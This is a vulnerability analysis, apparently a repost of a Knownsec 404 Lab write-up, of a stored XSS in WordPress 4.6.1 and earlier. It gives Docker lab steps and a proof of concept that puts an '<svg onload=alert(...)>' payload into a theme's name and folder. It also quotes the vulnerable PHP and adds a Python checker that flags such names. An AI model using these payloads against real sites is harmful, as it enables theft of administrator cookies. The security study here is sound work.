
WordPress <= 4.6.1 Stored XSS Triggered via Theme Files: Vulnerability Analysis

Category: Development (PHP) | Posted by 店小二03 | 2016 | Author tag: 红领巾

Author: p0wd3r (Knownsec 404 Security Lab, 知道创宇404安全实验室) Date: 2016-10-08

0x00 Vulnerability Overview

1. Summary

WordPress is a free, open-source blogging platform and content management system built on PHP and MySQL. Researchers recently found that in versions <= 4.6.1, uploading a maliciously crafted theme file triggers a stored XSS in the admin backend. Given the ability to upload theme files, an attacker can use this vulnerability to perform sensitive operations such as obtaining the administrator's cookie.

2. Impact

Provided that theme files can be uploaded, the attacker can carry out anything XSS allows, such as obtaining the administrator's cookie. There are two realistic attack scenarios:

- The attacker tricks an administrator into uploading a maliciously crafted theme file, and the administrator does not inspect the file.
- The attacker already holds administrator privileges and uploads the theme file directly; but with administrator privileges already in hand, this attack is redundant.

3. Affected versions

<= 4.6.1

0x01 Reproduction

1. Environment setup

```shell
docker pull wordpress:4.6.1
docker pull mysql
docker run --name wp-mysql -e MYSQL_ROOT_PASSWORD=hellowp -e MYSQL_DATABASE=wp -d mysql
# Run the 4.6.1 tag that was pulled; the untagged image name would start the latest (patched) release.
docker run --name wp --link wp-mysql:mysql -d wordpress:4.6.1
```

2. Vulnerability analysis

First, download any theme:

```shell
wget https://downloads.wordpress.org/theme/illdy.1.0.29.zip
unzip -x illdy.1.0.29.zip
```

Then make the following change to illdy/style.css:

```css
/*
Theme Name: <svg onload=alert(1234)>
...
(leave the remaining header fields unchanged)
...
*/
```

Next, rename the folder and re-pack it:

```shell
mv illdy "<svg onload=alert(5678)>"
zip -r theme.zip "<svg onload=alert(5678)>"
```

Once the archive is built, log in to the admin backend, upload the theme file, and start dynamic debugging at the same time.

Execution first enters wp-admin/includes/class-theme-installer-skin.php, lines 55-82:

```php
$name = $theme_info->display('Name');
// ...
if ( current_user_can( 'edit_theme_options' ) && current_user_can( 'customize' ) ) {
	$install_actions['preview'] = '<a href="' . wp_customize_url( $stylesheet ) . '" class="hide-if-no-customize load-customize"><span aria-hidden="true">' . __( 'Live Preview' ) . '</span><span class="screen-reader-text">' . sprintf( __( 'Live Preview &#8220;%s&#8221;' ), $name ) . '</span></a>';
}
```
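The sink above concatenates the theme name straight into HTML markup, and the archive built earlier carries markup in both the folder name and the Theme Name header. The following Python script is an added example (not code from the article or from WordPress) that inspects a theme archive before installation, flags markup characters in the top-level folder name and the Theme Name header, and shows the attribute-escaped form such a value should have at the sink; the function names and the in-memory fixture are constructed for this example.

```python
import html
import io
import re
import zipfile

# "Theme Name:" header field of style.css (the value WordPress shows in the admin UI).
THEME_NAME_RE = re.compile(r"^\s*Theme Name:\s*(.+?)\s*$", re.IGNORECASE | re.MULTILINE)
# Characters that never belong in a theme name or folder name; if the sink forgets
# to escape, they reach the admin page as markup.
MARKUP_CHARS = re.compile(r'[<>"\']')

def theme_name_from_style(css_text):
    # Returns the Theme Name header value, or None when the header is absent.
    m = THEME_NAME_RE.search(css_text)
    return m.group(1) if m else None

def inspect_theme_zip(zip_bytes):
    # Returns top-level folders, the Theme Name, and (kind, raw, escaped) findings,
    # where "escaped" is the HTML-safe form the preview link should have carried.
    findings, theme_name = [], None
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        folders = sorted({n.split("/", 1)[0] for n in names if "/" in n})
        for n in names:
            if n.count("/") == 1 and n.endswith("/style.css"):
                theme_name = theme_name_from_style(zf.read(n).decode("utf-8", "replace"))
                break
    for folder in folders:
        if MARKUP_CHARS.search(folder):
            findings.append(("folder", folder, html.escape(folder, quote=True)))
    if theme_name is None:
        findings.append(("header", "", "missing Theme Name"))
    elif MARKUP_CHARS.search(theme_name):
        findings.append(("header", theme_name, html.escape(theme_name, quote=True)))
    return {"folders": folders, "theme_name": theme_name, "findings": findings}

def build_sample_zip(folder, theme_name):
    # Constructed in-memory fixture mimicking the archive built in the article.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(f"{folder}/style.css", f"/*\nTheme Name: {theme_name}\nVersion: 1.0\n*/\n")
        zf.writestr(f"{folder}/index.php", "<?php // placeholder\n")
    return buf.getvalue()

if __name__ == "__main__":
    sample = build_sample_zip("<svg onload=alert(5678)>", "<svg onload=alert(1234)>")
    for kind, raw, escaped in inspect_theme_zip(sample)["findings"]:
        print(f"{kind}: {raw!r} -> safe form {escaped!r}")
```

Run the same check against a clean archive (folder `illdy`, Theme Name `Illdy`) and it reports no findings.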

Source page: http://www.codesec.net/view/483162.html